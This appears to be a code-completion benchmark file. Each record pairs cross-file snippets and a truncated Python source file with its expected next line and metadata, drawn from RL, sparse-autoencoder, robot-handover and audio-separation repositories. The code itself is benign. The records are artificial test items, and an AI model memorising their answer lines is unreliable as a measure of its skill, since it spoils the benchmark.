next_states[:self.capacity]\n\n @property\n def rewards(self):\n rewards = self.data.get('reward', None)\n return rewards[:self.capacity]\n\n @property\n def true_dones(self):\n true_dones = self.data.get('true_done', None)\n return true_dones[:self.capacity]\n\n @property\n def dones(self):\n dones = self.data.get('done', None)\n return dones[:self.capacity]\n\n @property\n def infos(self):\n return [data.info for idx, data in enumerate(self.list_data) if idx < self.capacity]\n\n @property\n def total_steps(self):\n return len(self.data['action'][0]) * self.capacity\n\n @property\n def num_envs(self):\n return len(self.data['action'][0])\n\n @property\n def done_indices(self):\n dids = []\n dones = torch_to_np(self.dones)\n for i in range(dones.shape[1]):\n di = dones[:, i]\n did = []\n if not np.any(di):\n did.append(len(di) - 1)\n else:\n did.extend(np.where(dones[:, i])[0])\n dids.append(did)\n return dids\n\n @property\n def episode_steps(self):\n steps = []\n dones = torch_to_np(self.dones)\n for i in range(dones.shape[1]):\n di = dones[:, i]\n if not np.any(di):\n steps.append(len(di))\n else:\n did = np.argwhere(di).flatten() + 1\n did = np.insert(did, 0, 0)\n diff = np.diff(did)\n steps.extend(diff.tolist())\n return steps"
},
{
"identifier": "TIMEOUT_KEY",
"path": "dexenv/utils/info_util.py",
"snippet": "TIMEOUT_KEY = 'TimeLimit.truncated'"
},
{
"identifier": "aggregate_traj_info",
"path": "dexenv/utils/info_util.py",
"snippet": "def aggregate_traj_info(infos, key, single_info=False):\n if single_info:\n infos = [infos]\n if isinstance(infos[0], Sequence):\n out = []\n for info in infos:\n time_out = []\n for env_info in info:\n time_out.append(env_info[key])\n out.append(np.stack(time_out))\n out = stack_data(out)\n elif isinstance(infos[0], dict):\n out = []\n for info in infos:\n tensor = info[key]\n out.append(tensor)\n out = stack_data(out)\n else:\n raise NotImplementedError\n if single_info:\n out = out.squeeze(0)\n return out"
},
{
"identifier": "info_has_key",
"path": "dexenv/utils/info_util.py",
"snippet": "def info_has_key(infos, key, single_info=False):\n if not single_info:\n infos = infos[0]\n if isinstance(infos, Sequence):\n return key in infos[0]\n elif isinstance(infos, dict):\n return key in infos\n else:\n raise NotImplementedError"
},
{
"identifier": "torch_to_np",
"path": "dexenv/utils/torch_utils.py",
"snippet": "def torch_to_np(tensor):\n if isinstance(tensor, np.ndarray):\n return tensor\n else:\n return tensor.cpu().detach().numpy()"
}
] | import numpy as np
import torch
from collections import deque
from dataclasses import dataclass
from omegaconf.dictconfig import DictConfig
from typing import Any
from dexenv.utils.common import stack_data
from dexenv.utils.data import TorchTrajectory
from dexenv.utils.info_util import TIMEOUT_KEY
from dexenv.utils.info_util import aggregate_traj_info
from dexenv.utils.info_util import info_has_key
from dexenv.utils.torch_utils import torch_to_np | 2,537 |
@dataclass
class BasicRunner:
agent: Any
env: Any
cfg: DictConfig
eval_env: Any = None
store_next_ob: bool = True
def __post_init__(self):
self.train_env = self.env
self.num_train_envs = self.env.num_envs
self.obs = None
if self.eval_env is None:
self.eval_env = self.env
self.train_ep_return = deque(maxlen=self.cfg.alg.deque_size)
self.train_ep_len = deque(maxlen=self.cfg.alg.deque_size)
self.train_success = deque(maxlen=self.cfg.alg.deque_size)
self.save_ob_in_eval = self.cfg.save_ob_in_eval
self.disable_tqdm = not self.cfg.alg.tqdm
self.reset_record()
def __call__(self, **kwargs):
raise NotImplementedError
def reset(self, env=None, *args, **kwargs):
if env is None:
env = self.train_env
self.obs = env.reset(*args, **kwargs)
self.reset_record()
def reset_record(self):
self.cur_ep_len = np.zeros(self.num_train_envs)
self.cur_ep_return = np.zeros(self.num_train_envs)
def create_traj(self, evaluation=False):
if evaluation:
capacity = self.cfg.alg.eval_rollout_steps
else:
capacity = self.cfg.alg.train_rollout_steps
return TorchTrajectory(capacity=capacity,
traj_keys_in_cpu=self.cfg.alg.traj_keys_in_cpu)
def handle_timeout(self, next_ob, done, reward, info, skip_record=False):
if info_has_key(info, TIMEOUT_KEY, single_info=True):
|
@dataclass
class BasicRunner:
agent: Any
env: Any
cfg: DictConfig
eval_env: Any = None
store_next_ob: bool = True
def __post_init__(self):
self.train_env = self.env
self.num_train_envs = self.env.num_envs
self.obs = None
if self.eval_env is None:
self.eval_env = self.env
self.train_ep_return = deque(maxlen=self.cfg.alg.deque_size)
self.train_ep_len = deque(maxlen=self.cfg.alg.deque_size)
self.train_success = deque(maxlen=self.cfg.alg.deque_size)
self.save_ob_in_eval = self.cfg.save_ob_in_eval
self.disable_tqdm = not self.cfg.alg.tqdm
self.reset_record()
def __call__(self, **kwargs):
raise NotImplementedError
def reset(self, env=None, *args, **kwargs):
if env is None:
env = self.train_env
self.obs = env.reset(*args, **kwargs)
self.reset_record()
def reset_record(self):
self.cur_ep_len = np.zeros(self.num_train_envs)
self.cur_ep_return = np.zeros(self.num_train_envs)
def create_traj(self, evaluation=False):
if evaluation:
capacity = self.cfg.alg.eval_rollout_steps
else:
capacity = self.cfg.alg.train_rollout_steps
return TorchTrajectory(capacity=capacity,
traj_keys_in_cpu=self.cfg.alg.traj_keys_in_cpu)
def handle_timeout(self, next_ob, done, reward, info, skip_record=False):
if info_has_key(info, TIMEOUT_KEY, single_info=True): | time_out = aggregate_traj_info(info, TIMEOUT_KEY, single_info=True) | 3 | 2023-10-25 17:22:41+00:00 | 4k |
ai-safety-foundation/sparse_autoencoder | sparse_autoencoder/autoencoder/components/unit_norm_decoder.py | [
{
"identifier": "ResetOptimizerParameterDetails",
"path": "sparse_autoencoder/autoencoder/types.py",
"snippet": "class ResetOptimizerParameterDetails(NamedTuple):\n \"\"\"Reset Optimizer Parameter Details.\n\n Details of a parameter that should be reset in the optimizer, when resetting\n it's corresponding dictionary vectors.\n \"\"\"\n\n parameter: Parameter\n \"\"\"Parameter to reset.\"\"\"\n\n axis: int\n \"\"\"Axis of the parameter to reset.\"\"\""
},
{
"identifier": "Axis",
"path": "sparse_autoencoder/tensor_types.py",
"snippet": "class Axis(LowercaseStrEnum):\n \"\"\"Tensor axis names.\n\n Used to annotate tensor types.\n\n Example:\n When used directly it prints a string:\n\n >>> print(Axis.INPUT_OUTPUT_FEATURE)\n input_output_feature\n\n The primary use is to annotate tensor types:\n\n >>> from jaxtyping import Float\n >>> from torch import Tensor\n >>> from typing import TypeAlias\n >>> batch: TypeAlias = Float[Tensor, Axis.names(Axis.BATCH, Axis.INPUT_OUTPUT_FEATURE)]\n >>> print(batch)\n <class 'jaxtyping.Float[Tensor, 'batch input_output_feature']'>\n\n You can also join multiple axis together to represent the dimensions of a tensor:\n\n >>> print(Axis.names(Axis.BATCH, Axis.INPUT_OUTPUT_FEATURE))\n batch input_output_feature\n \"\"\"\n\n # Component idx\n COMPONENT = auto()\n \"\"\"Component index.\"\"\"\n\n COMPONENT_OPTIONAL = \"*component\"\n \"\"\"Optional component index.\"\"\"\n\n # Batches\n SOURCE_DATA_BATCH = auto()\n \"\"\"Batch of prompts used to generate source model activations.\"\"\"\n\n BATCH = auto()\n \"\"\"Batch of items that the SAE is being trained on.\"\"\"\n\n STORE_BATCH = auto()\n \"\"\"Batch of items to be written to the store.\"\"\"\n\n ITEMS = auto()\n \"\"\"Arbitrary number of items.\"\"\"\n\n # Features\n INPUT_OUTPUT_FEATURE = auto()\n \"\"\"Input or output feature (e.g. feature in activation vector from source model).\"\"\"\n\n LEARNT_FEATURE = auto()\n \"\"\"Learn feature (e.g. feature in learnt activation vector).\"\"\"\n\n DEAD_FEATURE = auto()\n \"\"\"Dead feature.\"\"\"\n\n ALIVE_FEATURE = auto()\n \"\"\"Alive feature.\"\"\"\n\n # Feature indices\n INPUT_OUTPUT_FEATURE_IDX = auto()\n \"\"\"Input or output feature index.\"\"\"\n\n LEARNT_FEATURE_IDX = auto()\n \"\"\"Learn feature index.\"\"\"\n\n # Other\n POSITION = auto()\n \"\"\"Token position.\"\"\"\n\n SINGLE_ITEM = \"\"\n \"\"\"Single item axis.\"\"\"\n\n ANY = \"...\"\n \"\"\"Any number of axis.\"\"\"\n\n @staticmethod\n def names(*axis: \"Axis\") -> str:\n \"\"\"Join multiple axis together, to represent the dimensions of a tensor.\n\n Example:\n >>> print(Axis.names(Axis.BATCH, Axis.INPUT_OUTPUT_FEATURE))\n batch input_output_feature\n\n Args:\n *axis: Axis to join.\n\n Returns:\n Joined axis string.\n \"\"\"\n return \" \".join(a.value for a in axis)"
},
{
"identifier": "shape_with_optional_dimensions",
"path": "sparse_autoencoder/utils/tensor_shape.py",
"snippet": "def shape_with_optional_dimensions(*shape: int | None) -> tuple[int, ...]:\n \"\"\"Create a shape from a tuple of optional dimensions.\n\n Motivation:\n By default PyTorch tensor shapes will error if you set an axis to `None`. This allows\n you to set that size and then the resulting output simply removes that axis.\n\n Examples:\n >>> shape_with_optional_dimensions(1, 2, 3)\n (1, 2, 3)\n\n >>> shape_with_optional_dimensions(1, None, 3)\n (1, 3)\n\n >>> shape_with_optional_dimensions(1, None, None)\n (1,)\n\n >>> shape_with_optional_dimensions(None, None, None)\n ()\n\n Args:\n *shape: Axis sizes, with `None` representing an optional axis.\n\n Returns:\n Axis sizes.\n \"\"\"\n return tuple(dimension for dimension in shape if dimension is not None)"
}
] | from typing import final
from jaxtyping import Float, Int64
from pydantic import PositiveInt, validate_call
from torch import Tensor
from torch.nn import Module, Parameter, init
from sparse_autoencoder.autoencoder.types import ResetOptimizerParameterDetails
from sparse_autoencoder.tensor_types import Axis
from sparse_autoencoder.utils.tensor_shape import shape_with_optional_dimensions
import einops
import torch | 1,910 | """Linear layer with unit norm weights."""
@final
class UnitNormDecoder(Module):
r"""Constrained unit norm linear decoder layer.
Linear layer decoder, where the dictionary vectors (columns of the weight matrix) are
constrained to have unit norm. This is done by removing the gradient information parallel to the
dictionary vectors before applying the gradient step, using a backward hook. It also requires
`constrain_weights_unit_norm` to be called after each gradient step, to prevent drift of the
dictionary vectors away from unit norm (as optimisers such as Adam don't strictly follow the
gradient, but instead follow a modified gradient that includes momentum).
$$ \begin{align*}
m &= \text{learned features dimension} \\
n &= \text{input and output dimension} \\
b &= \text{batch items dimension} \\
f \in \mathbb{R}^{b \times m} &= \text{encoder output} \\
W_d \in \mathbb{R}^{n \times m} &= \text{weight matrix} \\
z \in \mathbb{R}^{b \times m} &= f W_d^T = \text{UnitNormDecoder output (pre-tied bias)}
\end{align*} $$
Motivation:
Normalisation of the columns (dictionary features) prevents the model from reducing the
sparsity loss term by increasing the size of the feature vectors in $W_d$.
Note that the *Towards Monosemanticity: Decomposing Language Models With Dictionary
Learning* paper found that removing the gradient information parallel to the dictionary
vectors before applying the gradient step, rather than resetting the dictionary vectors to
unit norm after each gradient step, results in a small but real reduction in total
loss](https://transformer-circuits.pub/2023/monosemantic-features/index.html#appendix-autoencoder-optimization).
"""
_learnt_features: int
"""Number of learnt features (inputs to this layer)."""
_decoded_features: int
"""Number of decoded features (outputs from this layer)."""
_n_components: int | None
weight: Float[
Parameter,
Axis.names(Axis.COMPONENT_OPTIONAL, Axis.INPUT_OUTPUT_FEATURE, Axis.LEARNT_FEATURE),
]
"""Weight parameter.
Each column in the weights matrix acts as a dictionary vector, representing a single basis
element in the learned activation space.
"""
@property
def reset_optimizer_parameter_details(self) -> list[ResetOptimizerParameterDetails]:
"""Reset optimizer parameter details.
Details of the parameters that should be reset in the optimizer, when resetting
dictionary vectors.
Returns:
List of tuples of the form `(parameter, axis)`, where `parameter` is the parameter to
reset (e.g. encoder.weight), and `axis` is the axis of the parameter to reset.
"""
return [ResetOptimizerParameterDetails(parameter=self.weight, axis=-1)]
@validate_call
def __init__(
self,
learnt_features: PositiveInt,
decoded_features: PositiveInt,
n_components: PositiveInt | None,
*,
enable_gradient_hook: bool = True,
) -> None:
"""Initialize the constrained unit norm linear layer.
Args:
learnt_features: Number of learnt features in the autoencoder.
decoded_features: Number of decoded (output) features in the autoencoder.
n_components: Number of source model components the SAE is trained on.
enable_gradient_hook: Enable the gradient backwards hook (modify the gradient before
applying the gradient step, to maintain unit norm of the dictionary vectors).
"""
super().__init__()
self._learnt_features = learnt_features
self._decoded_features = decoded_features
self._n_components = n_components
# Create the linear layer as per the standard PyTorch linear layer
self.weight = Parameter(
torch.empty(
| """Linear layer with unit norm weights."""
@final
class UnitNormDecoder(Module):
r"""Constrained unit norm linear decoder layer.
Linear layer decoder, where the dictionary vectors (columns of the weight matrix) are
constrained to have unit norm. This is done by removing the gradient information parallel to the
dictionary vectors before applying the gradient step, using a backward hook. It also requires
`constrain_weights_unit_norm` to be called after each gradient step, to prevent drift of the
dictionary vectors away from unit norm (as optimisers such as Adam don't strictly follow the
gradient, but instead follow a modified gradient that includes momentum).
$$ \begin{align*}
m &= \text{learned features dimension} \\
n &= \text{input and output dimension} \\
b &= \text{batch items dimension} \\
f \in \mathbb{R}^{b \times m} &= \text{encoder output} \\
W_d \in \mathbb{R}^{n \times m} &= \text{weight matrix} \\
z \in \mathbb{R}^{b \times m} &= f W_d^T = \text{UnitNormDecoder output (pre-tied bias)}
\end{align*} $$
Motivation:
Normalisation of the columns (dictionary features) prevents the model from reducing the
sparsity loss term by increasing the size of the feature vectors in $W_d$.
Note that the *Towards Monosemanticity: Decomposing Language Models With Dictionary
Learning* paper found that removing the gradient information parallel to the dictionary
vectors before applying the gradient step, rather than resetting the dictionary vectors to
unit norm after each gradient step, results in a small but real reduction in total
loss](https://transformer-circuits.pub/2023/monosemantic-features/index.html#appendix-autoencoder-optimization).
"""
_learnt_features: int
"""Number of learnt features (inputs to this layer)."""
_decoded_features: int
"""Number of decoded features (outputs from this layer)."""
_n_components: int | None
weight: Float[
Parameter,
Axis.names(Axis.COMPONENT_OPTIONAL, Axis.INPUT_OUTPUT_FEATURE, Axis.LEARNT_FEATURE),
]
"""Weight parameter.
Each column in the weights matrix acts as a dictionary vector, representing a single basis
element in the learned activation space.
"""
@property
def reset_optimizer_parameter_details(self) -> list[ResetOptimizerParameterDetails]:
"""Reset optimizer parameter details.
Details of the parameters that should be reset in the optimizer, when resetting
dictionary vectors.
Returns:
List of tuples of the form `(parameter, axis)`, where `parameter` is the parameter to
reset (e.g. encoder.weight), and `axis` is the axis of the parameter to reset.
"""
return [ResetOptimizerParameterDetails(parameter=self.weight, axis=-1)]
@validate_call
def __init__(
self,
learnt_features: PositiveInt,
decoded_features: PositiveInt,
n_components: PositiveInt | None,
*,
enable_gradient_hook: bool = True,
) -> None:
"""Initialize the constrained unit norm linear layer.
Args:
learnt_features: Number of learnt features in the autoencoder.
decoded_features: Number of decoded (output) features in the autoencoder.
n_components: Number of source model components the SAE is trained on.
enable_gradient_hook: Enable the gradient backwards hook (modify the gradient before
applying the gradient step, to maintain unit norm of the dictionary vectors).
"""
super().__init__()
self._learnt_features = learnt_features
self._decoded_features = decoded_features
self._n_components = n_components
# Create the linear layer as per the standard PyTorch linear layer
self.weight = Parameter(
torch.empty( | shape_with_optional_dimensions(n_components, decoded_features, learnt_features), | 2 | 2023-10-27 07:37:15+00:00 | 4k |
NVlabs/handover-sim2real | examples/train.py | [
{
"identifier": "get_cfg",
"path": "handover_sim2real/config.py",
"snippet": "def get_cfg(handover_config_only=False):\n if not handover_config_only:\n cfg = _C\n else:\n cfg = _C_handover_config\n return cfg.clone()"
},
{
"identifier": "HandoverSim2RealPolicy",
"path": "handover_sim2real/policy.py",
"snippet": "class HandoverSim2RealPolicy:\n def __init__(self, cfg, agent, grasp_agent, grasp_pred_threshold, use_ray=False, seed=None):\n self._cfg = cfg\n self._agent = agent\n self._grasp_agent = grasp_agent\n self._grasp_pred_threshold = grasp_pred_threshold\n self._use_ray = use_ray\n\n self._point_listener = PointListener(cfg, seed=seed)\n\n self._panda_base_invert_transform = pybullet.invertTransform(\n self._cfg.ENV.PANDA_BASE_POSITION, self._cfg.ENV.PANDA_BASE_ORIENTATION\n )\n\n self._steps_action_repeat = int(\n self._cfg.POLICY.TIME_ACTION_REPEAT / self._cfg.SIM.TIME_STEP\n )\n self._steps_close_gripper = int(\n self._cfg.POLICY.TIME_CLOSE_GRIPPER / self._cfg.SIM.TIME_STEP\n )\n self._standoff_offset = np.array([0.0, 0.0, 0.08])\n\n @property\n def steps_action_repeat(self):\n return self._steps_action_repeat\n\n def reset(self):\n self._done_frame = None\n self._grasp = None\n self._back = None\n\n self._point_listener.reset()\n\n def get_state(self, obs):\n point_states, elapsed_time = self._get_point_states_from_callback(obs)\n ee_pose = self._get_ee_pose(obs, in_panda_base=True)\n state = self._point_listener.point_states_to_state(point_states, ee_pose)\n return state, elapsed_time\n\n @timer\n def _get_point_states_from_callback(self, obs):\n point_states = obs[\"callback_get_point_states\"]()\n point_states = [point_state.T for point_state in point_states]\n return point_states\n\n def _get_ee_pose(self, obs, in_panda_base=False):\n pos = obs[\"panda_body\"].link_state[0, obs[\"panda_link_ind_hand\"], 0:3]\n orn = obs[\"panda_body\"].link_state[0, obs[\"panda_link_ind_hand\"], 3:7]\n if in_panda_base:\n pos, orn = pybullet.multiplyTransforms(*self._panda_base_invert_transform, pos, orn)\n ee_pose = unpack_pose(np.hstack((pos, tf_quat(orn))))\n return ee_pose\n\n def select_action(self, state, expert_policy=False):\n if self._use_ray:\n action, _, _, _ = ray.get(\n self._agent.select_action.remote(\n state, remain_timestep=1, expert_policy=expert_policy\n )\n )\n else:\n action, _, _, _ = self._agent.select_action(\n state, remain_timestep=1, expert_policy=expert_policy\n )\n return action\n\n def convert_action_to_target_joint_position(self, action, obs):\n ee_pose = self._get_ee_pose(obs)\n delta_ee_pose = unpack_action(action)\n target_ee_pose = np.matmul(ee_pose, delta_ee_pose)\n\n pos = target_ee_pose[:3, 3]\n orn = Rot.from_matrix(target_ee_pose[:3, :3]).as_quat()\n target_joint_position = pybullet.calculateInverseKinematics(\n obs[\"panda_body\"].contact_id[0], obs[\"panda_link_ind_hand\"] - 1, pos, orn\n )\n target_joint_position = np.array(target_joint_position)\n target_joint_position[7:9] = 0.04\n\n return target_joint_position\n\n def select_action_grasp(self, state):\n if self._use_ray:\n action = ray.get(\n self._grasp_agent.select_action_grasp.remote(state, self._grasp_pred_threshold)\n )\n else:\n action = self._grasp_agent.select_action_grasp(state, self._grasp_pred_threshold)\n return action\n\n def grasp_and_back(self, obs):\n if self._done_frame is None:\n self._done_frame = obs[\"frame\"]\n\n done = False\n\n if obs[\"frame\"] < self._done_frame + 4 * self._steps_action_repeat:\n if self._grasp is None:\n pos = obs[\"panda_body\"].link_state[0, obs[\"panda_link_ind_hand\"], 0:3].numpy()\n orn = obs[\"panda_body\"].link_state[0, obs[\"panda_link_ind_hand\"], 3:7].numpy()\n R = Rot.from_quat(orn).as_matrix()\n reach_goal = np.matmul(R, self._standoff_offset) + pos\n reach_traj = np.linspace(pos, reach_goal, 5)[1:]\n\n self._grasp = []\n for pos in reach_traj:\n conf = pybullet.calculateInverseKinematics(\n obs[\"panda_body\"].contact_id[0],\n obs[\"panda_link_ind_hand\"] - 1,\n pos,\n orn,\n )\n conf = np.array(conf)\n conf[7:9] = 0.04\n self._grasp.append(conf)\n\n i = (obs[\"frame\"] - self._done_frame) // self._steps_action_repeat\n action = self._grasp[i].copy()\n elif (\n obs[\"frame\"]\n < self._done_frame + 4 * self._steps_action_repeat + self._steps_close_gripper\n ):\n action = self._grasp[3].copy()\n action[7:9] = 0.0\n else:\n if self._back is None:\n self._back = []\n pos = obs[\"panda_body\"].link_state[0, obs[\"panda_link_ind_hand\"], 0:3].numpy()\n dpos_goal = self._cfg.BENCHMARK.GOAL_CENTER - pos\n dpos_step = dpos_goal / np.linalg.norm(dpos_goal) * self._cfg.POLICY.BACK_STEP_SIZE\n num_steps = int(\n np.ceil(np.linalg.norm(dpos_goal) / self._cfg.POLICY.BACK_STEP_SIZE)\n )\n for _ in range(num_steps):\n pos += dpos_step\n conf = pybullet.calculateInverseKinematics(\n obs[\"panda_body\"].contact_id[0], obs[\"panda_link_ind_hand\"] - 1, pos\n )\n conf = np.array(conf)\n conf[7:9] = 0.0\n self._back.append(conf)\n\n num_frames = (\n obs[\"frame\"]\n - self._done_frame\n - 4 * self._steps_action_repeat\n - self._steps_close_gripper\n )\n i = num_frames // self._steps_action_repeat\n i = min(i, len(self._back) - 1)\n action = self._back[i].copy()\n done = i == len(self._back) - 1\n\n return action, done"
},
{
"identifier": "add_sys_path_from_env",
"path": "handover_sim2real/utils.py",
"snippet": "def add_sys_path_from_env(name):\n assert name in os.environ, \"Environment variable '{}' is not set\".format(name)\n if os.environ[name] not in sys.path:\n sys.path.append(os.environ[name])"
}
] | import argparse
import gym
import itertools
import numpy as np
import os
import ray
from datetime import datetime
from handover.benchmark_wrapper import EpisodeStatus, HandoverBenchmarkWrapper
from handover_sim2real.config import get_cfg
from handover_sim2real.policy import HandoverSim2RealPolicy
from handover_sim2real.utils import add_sys_path_from_env
from experiments.config import cfg_from_file, save_cfg_to_file
from core.trainer import (
AgentWrapper,
AgentWrapperGPU05,
ReplayMemoryWrapper,
ReplayMemoryWrapperBase,
RolloutAgentWrapperGPU1,
Trainer,
TrainerRemote,
)
from core.utils import get_noise_delta, get_valid_index, rand_sample_joint | 2,315 | # Copyright (c) 2022-2023 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the NVIDIA License [see LICENSE for details].
add_sys_path_from_env("GADDPG_DIR")
def parse_args():
parser = argparse.ArgumentParser(description="Train.")
parser.add_argument("--cfg-file", help="path to config file")
parser.add_argument("--seed", default=0, type=int, help="random seed")
parser.add_argument("--use-grasp-predictor", action="store_true", help="use grasp predictor")
parser.add_argument("--use-ray", action="store_true", help="use Ray")
parser.add_argument("--pretrained-dir", help="pretrained model directory")
parser.add_argument(
"opts",
nargs=argparse.REMAINDER,
help=(
"""modify config options at the end of the command; use space-separated """
""""PATH.KEY VALUE" pairs; see handover_sim2real/config.py, """
"""handover-sim/handover/config.py, and easysim/src/easysim/config.py for all options"""
),
)
args = parser.parse_args()
return args
class ActorWrapper:
def __init__(
self,
stage,
cfg,
use_ray,
rollout_agent,
expert_buffer,
online_buffer,
actor_seed,
grasp_agent,
grasp_pred_threshold,
):
self._stage = stage
self._cfg = cfg
self._use_ray = use_ray
self._expert_buffer = expert_buffer
self._online_buffer = online_buffer
self._use_grasp_predictor = grasp_agent is not None
self._env = HandoverBenchmarkWrapper(gym.make(self._cfg.ENV.ID, cfg=self._cfg))
| # Copyright (c) 2022-2023 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the NVIDIA License [see LICENSE for details].
add_sys_path_from_env("GADDPG_DIR")
def parse_args():
parser = argparse.ArgumentParser(description="Train.")
parser.add_argument("--cfg-file", help="path to config file")
parser.add_argument("--seed", default=0, type=int, help="random seed")
parser.add_argument("--use-grasp-predictor", action="store_true", help="use grasp predictor")
parser.add_argument("--use-ray", action="store_true", help="use Ray")
parser.add_argument("--pretrained-dir", help="pretrained model directory")
parser.add_argument(
"opts",
nargs=argparse.REMAINDER,
help=(
"""modify config options at the end of the command; use space-separated """
""""PATH.KEY VALUE" pairs; see handover_sim2real/config.py, """
"""handover-sim/handover/config.py, and easysim/src/easysim/config.py for all options"""
),
)
args = parser.parse_args()
return args
class ActorWrapper:
def __init__(
self,
stage,
cfg,
use_ray,
rollout_agent,
expert_buffer,
online_buffer,
actor_seed,
grasp_agent,
grasp_pred_threshold,
):
self._stage = stage
self._cfg = cfg
self._use_ray = use_ray
self._expert_buffer = expert_buffer
self._online_buffer = online_buffer
self._use_grasp_predictor = grasp_agent is not None
self._env = HandoverBenchmarkWrapper(gym.make(self._cfg.ENV.ID, cfg=self._cfg))
| self._policy = HandoverSim2RealPolicy( | 1 | 2023-10-26 23:25:13+00:00 | 4k |
vb000/SemanticHearing | src/training/dcc_tf_binaural.py | [
{
"identifier": "mod_pad",
"path": "src/training/dcc_tf.py",
"snippet": "def mod_pad(x, chunk_size, pad):\n # Mod pad the input to perform integer number of\n # inferences\n mod = 0\n if (x.shape[-1] % chunk_size) != 0:\n mod = chunk_size - (x.shape[-1] % chunk_size)\n\n x = F.pad(x, (0, mod))\n x = F.pad(x, pad)\n\n return x, mod"
},
{
"identifier": "MaskNet",
"path": "src/training/dcc_tf.py",
"snippet": "class MaskNet(nn.Module):\n def __init__(self, model_dim, num_enc_layers, dec_buf_len,\n dec_chunk_size, num_dec_layers, use_pos_enc, conditioning):\n super(MaskNet, self).__init__()\n\n # Encoder based on dilated causal convolutions.\n self.encoder = DilatedCausalConvEncoder(channels=model_dim,\n num_layers=num_enc_layers)\n\n # Transformer decoder that operates on chunks of size\n # buffer size.\n self.decoder = CausalTransformerDecoder(\n model_dim=model_dim, ctx_len=dec_buf_len, chunk_size=dec_chunk_size,\n num_layers=num_dec_layers, nhead=8, use_pos_enc=use_pos_enc,\n ff_dim=2 * model_dim, conditioning=conditioning)\n\n def forward(self, x, l, enc_buf, dec_buf):\n \"\"\"\n Generates a mask based on encoded input `e` and the one-hot\n label `label`.\n\n Args:\n x: [B, C, T]\n Input audio sequence\n l: [B, C]\n Label embedding\n ctx_buf: {[B, C, <receptive field of the layer>], ...}\n List of context buffers maintained by DCC encoder\n \"\"\"\n # Enocder the label integrated input\n e, enc_buf = self.encoder(x, enc_buf)\n\n # Decoder conditioned on embedding\n m, dec_buf = self.decoder(input=e, embedding=l, ctx_buf=dec_buf)\n\n return m, enc_buf, dec_buf"
},
{
"identifier": "itd_diff",
"path": "src/helpers/eval_utils.py",
"snippet": "def itd_diff(s_est, s_gt, sr):\n \"\"\"\n Computes the ITD error between model estimate and ground truth\n input: (*, 2, T), (*, 2, T)\n \"\"\"\n TMAX = int(round(1e-3 * sr))\n itd_est = compute_itd(s_est[..., 0, :], s_est[..., 1, :], sr, TMAX)\n itd_gt = compute_itd(s_gt[..., 0, :], s_gt[..., 1, :], sr, TMAX)\n return np.abs(itd_est - itd_gt)"
},
{
"identifier": "ild_diff",
"path": "src/helpers/eval_utils.py",
"snippet": "def ild_diff(s_est, s_gt):\n \"\"\"\n Computes the ILD error between model estimate and ground truth\n input: (*, 2, T), (*, 2, T)\n \"\"\"\n ild_est = compute_ild(s_est[..., 0, :], s_est[..., 1, :])\n ild_gt = compute_ild(s_gt[..., 0, :], s_gt[..., 1, :])\n return np.abs(ild_est - ild_gt)"
}
] | import os
import math
import logging
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchaudio
from collections import OrderedDict
from typing import Optional
from copy import deepcopy
from torch import Tensor
from torchmetrics.functional import(
scale_invariant_signal_noise_ratio as si_snr,
signal_noise_ratio as snr,
signal_distortion_ratio as sdr,
scale_invariant_signal_distortion_ratio as si_sdr)
from src.training.dcc_tf import mod_pad, MaskNet
from src.helpers.eval_utils import itd_diff, ild_diff | 2,293 | padding=out_buf_len * L, bias=False),
nn.Tanh())
if pretrained_path is not None:
state_dict = torch.load(pretrained_path)['model_state_dict']
# Load all the layers except label_embedding and freeze them
for name, param in self.named_parameters():
if 'label_embedding' not in name:
param.data = state_dict[name]
param.requires_grad = False
def init_buffers(self, batch_size, device):
enc_buf = self.mask_gen.encoder.init_ctx_buf(batch_size, device)
dec_buf = self.mask_gen.decoder.init_ctx_buf(batch_size, device)
out_buf = torch.zeros(batch_size, self.model_dim, self.out_buf_len,
device=device)
return enc_buf, dec_buf, out_buf
def predict(self, x, label, enc_buf, dec_buf, out_buf):
# Generate latent space representation of the input
x = self.in_conv(x)
# Generate label embedding
l = self.label_embedding(label) # [B, label_len] --> [B, channels]
l = l.unsqueeze(1).unsqueeze(-1) # [B, 1, channels, 1]
# Generate mask corresponding to the label
m, enc_buf, dec_buf = self.mask_gen(x, l, enc_buf, dec_buf)
# Apply mask and decode
x = x * m
x = torch.cat((out_buf, x), dim=-1)
out_buf = x[..., -self.out_buf_len:]
x = self.out_conv(x)
return x, enc_buf, dec_buf, out_buf
def forward(self, inputs, init_enc_buf=None, init_dec_buf=None,
init_out_buf=None, pad=True, writer=None, step=None, idx=None):
"""
Extracts the audio corresponding to the `label` in the given
`mixture`. Generates `chunk_size` samples per iteration.
Args:
mixed: [B, n_mics, T]
input audio mixture
label: [B, num_labels]
one hot label
Returns:
out: [B, n_spk, T]
extracted audio with sounds corresponding to the `label`
"""
x, label = inputs['mixture'], inputs['label_vector']
if init_enc_buf is None or init_dec_buf is None or init_out_buf is None:
assert init_enc_buf is None and \
init_dec_buf is None and \
init_out_buf is None, \
"Both buffers have to initialized, or " \
"both of them have to be None."
enc_buf, dec_buf, out_buf = self.init_buffers(
x.shape[0], x.device)
else:
enc_buf, dec_buf, out_buf = \
init_enc_buf, init_dec_buf, init_out_buf
mod = 0
if pad:
pad_size = (self.L, self.L) if self.lookahead else (0, 0)
x, mod = mod_pad(x, chunk_size=self.L, pad=pad_size)
x, enc_buf, dec_buf, out_buf = self.predict(
x, label, enc_buf, dec_buf, out_buf)
# Remove mod padding, if present.
if mod != 0:
x = x[:, :, :-mod]
out = {'x': x}
if init_enc_buf is None:
return out
else:
return out, enc_buf, dec_buf, out_buf
# Define optimizer, loss and metrics
def optimizer(model, data_parallel=False, **kwargs):
params = [p for p in model.parameters() if p.requires_grad]
return optim.Adam(params, **kwargs)
def loss(_output, tgt):
pred = _output['x']
return -0.9 * snr(pred, tgt).mean() - 0.1 * si_snr(pred, tgt).mean()
def metrics(inputs, _output, gt):
""" Function to compute metrics """
mixed = inputs['mixture']
output = _output['x']
metrics = {}
def metric_i(metric, src, pred, tgt):
_vals = []
for s, t, p in zip(src, tgt, pred):
_vals.append(torch.mean((metric(p, t) - metric(s, t))).cpu().item())
return _vals
for m_fn in [snr, si_snr]:
metrics[m_fn.__name__] = metric_i(m_fn,
mixed[:, :gt.shape[1], :],
output,
gt)
return metrics
def test_metrics(inputs, _output, gt):
test_metrics = metrics(inputs, _output, gt)
output = _output['x']
delta_itds, delta_ilds, snrs = [], [], []
for o, g in zip(output, gt):
|
